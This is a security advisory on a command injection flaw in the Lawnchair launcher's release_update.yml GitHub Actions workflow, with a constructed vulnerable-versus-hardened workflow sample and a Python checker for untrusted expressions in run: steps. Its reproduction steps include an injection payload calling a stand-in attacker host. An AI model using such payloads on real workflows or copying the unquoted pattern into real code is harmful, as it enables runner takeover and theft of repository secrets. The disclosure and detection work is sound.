Lawnchair Command Injection Vulnerability in GitHub Actions Workflow Allowing Arbitrary Code Execution
Vulnerability
A command injection vulnerability has been identified in the Lawnchair Android launcher, specifically within the release_update.yml GitHub Actions workflow. This issue, present in versions prior to a recent patch, allows arbitrary code execution by exploiting unquoted user input supplied at workflow dispatch. The vulnerability arises because the workflow interpolates the artifactName input directly into a shell command without quoting or sanitization, so shell metacharacters in the input are interpreted as part of the command.
Impact
Exploitation of this vulnerability could lead to arbitrary code execution on the GitHub Actions runner, with access to repository secrets and credentials. This could allow for exfiltration of sensitive data and potential supply chain attacks.
Reproduction
To reproduce this vulnerability, navigate to the Actions tab of the Lawnchair repository and select the Release Update workflow. Click 'Run workflow' and enter a crafted artifact name that includes command injection payloads, such as 'dummy; curl http://attacker.com; #'. Once the workflow is executed, the injected command will run in the context of the Actions runner, demonstrating the exploitation of the vulnerability.
Remediation
Users are advised to update to the latest version of Lawnchair, where this vulnerability has been patched.
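As an added illustration that is not the project's own workflow or code, the constructed workflow below reproduces the unsafe pattern the advisory describes next to a hardened form in which the input reaches the shell only through a quoted environment variable, and a small Python check flags run: steps that embed untrusted expressions. The script path, variable name and the list of untrusted expression contexts are assumptions.

```python
import re

# Constructed sample of the unsafe pattern the advisory describes: a workflow_dispatch input spliced straight into the command line.
VULNERABLE_WORKFLOW = """\
name: Release Update
on:
  workflow_dispatch:
    inputs:
      artifactName:
        required: true
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - run: ./scripts/publish.sh ${{ inputs.artifactName }}
"""
# Constructed hardened form: the input reaches the script only via a quoted environment variable, so the shell never parses it.
HARDENED_WORKFLOW = VULNERABLE_WORKFLOW.replace(
    "      - run: ./scripts/publish.sh ${{ inputs.artifactName }}",
    "      - env:\n          ARTIFACT_NAME: ${{ inputs.artifactName }}\n"
    '        run: ./scripts/publish.sh "$ARTIFACT_NAME"',
)
# Expression contexts whose value an outside party can choose (assumed list, not exhaustive).
UNTRUSTED = re.compile(r"\$\{\{[^}]*(\binputs\.|github\.event\.|github\.head_ref)")
RUN_LINE = re.compile(r"^\s*-?\s*run:\s*(.*)$")
indent = lambda s: len(s) - len(s.lstrip())

def find_injections(workflow_text):
    """Return (line_no, command) for each run: step whose command embeds an untrusted expression."""
    findings, lines, i = [], workflow_text.splitlines(), 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        if not m:
            i += 1
            continue
        start, run_indent, body = i + 1, indent(lines[i]), []
        i += 1
        if m.group(1).strip() in ("|", ">", "|-", ">-"):
            # Block scalar: the command is the following, deeper-indented lines.
            while i < len(lines) and (not lines[i].strip() or indent(lines[i]) > run_indent):
                body.append(lines[i].strip())
                i += 1
        else:
            body = [m.group(1).strip()]
        cmd = "\n".join(body).strip()
        if UNTRUSTED.search(cmd):
            findings.append((start, cmd))
    return findings
```

Running the check over an organisation's workflow files before a dispatch-triggered job is enabled catches this class of issue; the hardened form passes because the `${{ }}` expression is evaluated into `env`, not into the command text.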
